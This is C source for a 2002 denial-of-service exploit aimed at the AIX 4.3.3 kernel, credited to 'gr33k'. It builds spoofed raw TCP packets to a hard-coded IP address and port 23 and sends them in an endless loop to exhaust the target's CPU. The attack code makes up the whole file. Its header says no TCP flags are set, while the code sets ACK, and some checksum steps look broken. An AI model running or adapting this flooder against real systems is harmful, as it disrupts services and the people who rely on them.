/* This exploits a weakness in a function in the AIX kernel
   which handles the in/outgoing network connection.
   Setting no flags in the TCP header, causes a 100% CPU
   usage (DoS).

   Tested On IBM RS6000/SMP-M80/4) on AIX 4.3.3

   2002 by gr33k - gr33k@frapes.org   visit:[www.frapes.org]

   thanks: to the l337 ancient "Hephaestus" ;)
   greets: ZN+ixokratoria, terlega...*/

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
 register long sum;
 u_short oddbyte;
 register u_short answer;

 sum=0;
 while(nbytes > 1)
  {
   sum+= *ptr++;
   nbytes-= 2;
  }
 if(nbytes == 1)
  {
   oddbyte = 0;
   *((u_char *) &oddbyte) = *(u_char *)ptr;
   sum += oddbyte;
  }
 sum  = (sum >> 16) + (sum & 0xffff);
 sum += (sum >> 16);
 answer = ~sum;
 return(answer);
}

int main()
{
 int tcp_socket,j;
 static struct in_addr i;
 struct hostent *h;
 struct sockaddr_in sin;
 struct send_tcp
   {
    struct iphdr ip;
    struct tcphdr tcp;
   }send_tcp;

 send_tcp.ip.ihl=5;
 send_tcp.ip.version=4;
 send_tcp.ip.tos=0;
 send_tcp.ip.tot_len=htons(40);
 send_tcp.ip.id=getpid();
 send_tcp.ip.frag_off=0;
 send_tcp.ip.ttl=255;
 send_tcp.ip.protocol=IPPROTO_TCP;
 send_tcp.ip.check=0;
 send_tcp.ip.saddr=inet_addr("192.168.0.4");
 send_tcp.ip.daddr=inet_addr("139.6.57.1");

 send_tcp.tcp.source=getpid();
 send_tcp.tcp.dest=htons(23); 
 send_tcp.tcp.seq=getpid();
 send_tcp.tcp.ack_seq=0;
 send_tcp.tcp.res1=0;
 send_tcp.tcp.doff=5;
 send_tcp.tcp.syn=0;
 send_tcp.tcp.fin=0;
 send_tcp.tcp.rst=0;
 send_tcp.tcp.psh=0;
 send_tcp.tcp.ack=1;
 send_tcp.tcp.urg=0;
 send_tcp.tcp.res2=0;
 send_tcp.tcp.window=htons(512);
 send_tcp.tcp.check=0;
 send_tcp.tcp.urg_ptr=0;

 sin.sin_family=AF_INET;
 sin.sin_port=send_tcp.tcp.source;
 sin.sin_addr.s_addr=send_tcp.ip.daddr;

 tcp_socket= socket(AF_INET,SOCK_RAW,IPPROTO_RAW);

  for(;;)
   {
    send_tcp.tcp.source++;
    send_tcp.ip.id++;
    send_tcp.tcp.seq++;
    send_tcp.tcp.check = 0;
    send_tcp.ip.check = 0;
    send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
    bcopy((char *)&send_tcp.tcp, (char *)&send_tcp.tcp, 20);
    send_tcp.tcp.check = in_cksum((unsigned short *)&send_tcp, 32);

    sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sizeof(sin));
   }
 return 0;
}